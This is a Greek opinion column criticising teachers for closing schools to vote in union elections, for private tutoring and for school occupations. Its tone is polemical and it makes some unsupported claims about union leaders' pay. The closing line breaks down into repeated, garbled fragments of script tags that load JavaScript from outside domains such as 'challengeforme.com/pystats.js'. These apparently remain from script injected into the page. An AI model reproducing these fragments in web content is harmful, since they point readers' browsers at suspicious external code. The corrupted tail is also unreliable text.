Λευκές ημέρες και μαύρα χάλια

Κλειστά ήταν τα σχολεία της χώρας, την Τετάρτη 5 Νοεμβρίου, λόγω των εκλογών των δασκάλων και καθηγητών.

Γράφει ο Μπετόβλακας

Όχι αγαπητοί φίλοι, δεν είναι αστείο! Δεν είναι μαύρη προπαγάνδα κάποιου σκοτεινού κέντρου στο εξωτερικό! Δεν είναι λάσπη που εκτοξεύει κάποιος κακεντρεχής, στους άξιους εκπαιδευτικούς μας.

Είναι η πραγματικότητα, σε μια χώρα που πτώχευσε, και που σύμφωνα με μεγάλο τμήμα του πληθυσμού της, για τα χάλια μας φταίει η Μέρκελ, η Τρόικα, οι εξωγήινοι, οι μασόνοι, οι Πακιστανοί, οι Αμερικάνοι και όποιος άλλος μας βολεύει. Φταίνε όλοι οι άλλοι, εκτός από εμάς τους ίδιους. Βρείτε μου μια επιχείρηση σε ολόκληρο τον πλανήτη που να κλείνει για να πάνε να ψηφίσουν οι εργαζόμενοι της. Καμία και πουθενά. Αν μάλιστα υιοθετήσει κάποιος την άποψη ότι η παιδεία είναι ο βασικότερος πυλώνας μιας κοινωνίας, τότε η Πατρίδα είναι χαμένη από χέρι.

Θα πει κάποιος ότι δεν είναι ίδιοι όλοι οι εκπαιδευτικοί. Υπάρχουν και άνθρωποι που μοχθούν στις τάξεις, που παλεύουν κάτω από αντίξοες συνθήκες να μάθουν τα παιδιά μας γράμματα. Συμφωνώ! Όμως, ακόμα και αυτοί σωπαίνουν. Δε είδα να βγαίνει ανακοίνωση από μια πραγματικά προοδευτική παράταξη των εκπαιδευτικών και να λέει ότι αυτά τα φαινόμενα σαπίλας, πρέπει να σταματήσουν. Ότι δεν είναι δυνατόν να χάνονται μαθήματα για να ψηφίσουν οι εκπαιδευτικοί. Δεν είναι δυνατόν, να λένε οι καθηγητές ότι δεν μπορούν να διδάξουν πάνω από τρεις ώρες την ημέρα και όλο το απόγευμα να κάνουν ιδιαίτερα μαθήματα. Για όσο διάστημα δεν υπάρχει αντίδραση, σημαίνει ότι υπάρχει συναίνεση, άρα συνενοχή.

Οι συνδικαλΗστές- εκπαιδευτικοί μας, προσπάθησαν αλλά ευτυχώς δεν τα κατάφεραν, να τινάξουν τις περσινές εξετάσεις στον αέρα, επειδή το υπουργείο τους ζήτησε να δουλέψουν είκοσι λεπτά περισσότερο! Βέβαια αυτή την συμπεριφορά ο πρόεδρος τους, την εξαργύρωσε με μια θέση υποψηφίου ευρωβουλευτή στον ΣΥΡΙΖΑ, άρα με ένα μισθό 20χιλάδων ευρώ τον μήνα.

Παρατηρήθηκε επίσης, το συνηθισμένο για την ελληνική πραγματικότητα φαινόμενο, των καταλήψεων. Πεντακόσια περίπου σχολεία τελούν υπό κατάληψη. Τα αιτήματα είναι τα… γνωστά. Η τρόικα, η χρηματοδότηση κτλ. Τα πράγματα είναι απλά. Να βρει η κυβέρνηση τα κότσια, να καθαρίσει επιτέλους το τοπίο. Όσες ώρες χαθούν, να γίνουν στις διακοπές του Πάσχα και του καλοκαιριού χωρίς εκπτώσεις. Αν βρεθούν καθηγητές να υποκινούν τις καταλήψεις, να απολυθούν άμεσα, και οι εξωσχολικοί που τυχόν αναμιχθούν στις καταλήψεις, από το αυτί και στον εισαγγελέα.

Αντιλαμβάνομαι ότι είναι πολύ ωραία να κάνουν κατάληψη τα παιδιά και οι καθηγητές να πληρώνονται χωρίς να δουλεύουν. Είναι ακόμα καλύτερα, να κάνεις ιδιαίτερα και να κονομάς, για να μάθεις στα παιδιά, αυτά για τα οποία πληρώνεσαι να τους μάθεις το πρωί. Αλλά μπροστά σε 1,5 εκατομμύριο ανέργους του ιδιωτικού τομέα, είναι η απόλυτη ξεφτίλα!

Βρείτε τον Μπετόβλακα στο facebook___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >